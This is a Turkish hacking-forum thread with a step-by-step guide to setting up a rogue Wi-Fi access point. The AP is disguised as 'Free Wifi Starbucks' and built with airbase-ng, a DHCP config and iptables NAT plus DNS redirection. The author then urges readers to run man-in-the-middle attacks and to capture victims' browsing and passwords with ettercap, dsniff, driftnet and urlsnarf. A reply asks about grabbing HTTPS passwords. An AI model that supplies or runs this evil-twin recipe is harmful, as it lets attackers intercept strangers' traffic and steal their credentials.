Sahte Erişim Noktası Nasıl yapılır

Discussion in 'Derin konular' started by hax0r.tr, Nov 22, 2018.

  1. hax0r.tr

    hax0r.tr <?php dAyı ?>

    Mesajlar:
    639
    Likes Received:
    482
    Yapacağımız adımları anlatım sizlere:
    dhcpd.conf ayarlamak.
    Airbase-ng ile erişim noktasını çalıştırmak.
    IP-Tables ayarlamak.

    Benim sistemim:
    Kali-Linux
    2 tane Wifi cihazı.
    1: WLAN1 de çalışır ve gateway: 192.168.1.1. ( bu cihazda İnternet vardır ! )
    2: Laptopum içinde olan wifi cihazı (atheros, WLAN0).

    Haydi su dhcpd.conf dosyasının ayarını yapalım sonra devam edelim.

    nano /etc/dhcp3/dhcpd.conf” komutunu çalıştıralım ve içine bu satırları yapıştıralım.

    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.2.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.2.255;
    option routers 192.168.2.129;
    option domain-name-servers 4.2.2.2;
    range 192.168.2.130 192.168.2.140;
    }

    Ve CTRL-X’e basıp Y yazıp ENTER’e basilim.

    Simdi baslamak için ilk öncelik ile wifi cihazımız “Monitor” modu açık olması gerekiyor.

    airmon-ng

    komutunu girerek bütün wifi cihazlarımız sıralanır. ( tabi airbase-ng kurulu olması gerekiyor ).

    airmon-ng start wlan0

    komutunu girerek wifi cihazımızın monitor modunu açarız.

    airbase-ng -e “Free Wifi Starbucks” -c 9 mon0

    komutunu girdiğimiz anda sahte erişim noktamız Free Wifi Starbucks isim ile çalışmış olur. ( mon0, wifi cihazımızın monitor modundaki ismi ).

    Simdi yeni bir terminal açarak devam edelim.

    İfconfig at0 up

    komutunu calistiralim ve boylece at0 cihazi calismis olur.

    ifconfig at0 192.168.2.129 netmask 255.255.255.128

    komutunu çalıştıralım ve netmask ve gateway ayarını vermiş olalım.

    route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

    komutunu çalıştıralım ve netmask yolunu belirtelim.

    Simdi DHCP sunucumuzu çalıştırabiliriz. Tabi DCHP sunucusu kurulu olması lazım.
    Bunu kurmak için

    sudo apt-get install dhcp3-server

    yazmanız yeterli.

    mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd

    komutunu çalıştıralım ve haklarımızı tanımış olalım.

    dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

    komutunu çalıştıralım ve böylece DHCP sunucumuz çalıştırmış olalım.

    Simdi sizin yaptığınız erişim noktası çalışıyor fakat WLAN1 cihazımızdaki İnterneti paylaşmamız gerekir, paylaşmaz isek kimse bizim erişim noktası’na bağlanmaz ( kim İnterneti olmayan erişim noktası’na bağlanırki [​IMG] ).

    Yeni bir Terminal açalım ve devam edelim.

    iptables –flush
    iptables –table nat –flush
    iptables –delete-chain
    iptables –table nat –delete-chain

    komutları çalıştırarak iptables deki bütün ayarları silmiş oluyoruz.

    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables –table nat –append POSTROUTING –out-interface wlan1 -j MASQUERADE
    iptables –append FORWARD –in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp –dport 53 -j DNAT –to 192.168.1.1

    komutları çalıştırarak iptables’i ayarlarını yapmış oluyoruz.
    Bu ayarlardaki WLAN1 ve 192.168.1.1 benim kendi ayarlarım, belki sizde farklıdır.

    Simdi bunların hepsini yaptınız mi ? Hadi bakalım sahte erişim noktası çalışıyor.
    Böyle bir erişim noktası ile çök kotu şeyler yapabilirsiniz. Ettercap kullanarak man-in-the-middle saldırısı yapabilirsiniz, dnssiff, wireshark, driftnet, urlsnarf kullanarak nerelere girdiğini, girerken hangi şifre kullandığını görebilirsiniz. Tabi gerisi sizin hayal gücüne kalmış [​IMG] benden bukadar.
     
    emrelqqq and sabahattin like this.
  2. emre1314

    emre1314

    Mesajlar:
    65
    Likes Received:
    14
    emeğine sağlık bu dediklerinden wireshark'ı kullandım, sadece http protokolünü çözebildi. diğer programlar https şifreleri gösterir mi?
     
  3. deepweeb

    deepweeb

    Mesajlar:
    50
    Likes Received:
    30
    VPN aynı iş görmezmi
     
Loading...

Bu sayfayı Paylaş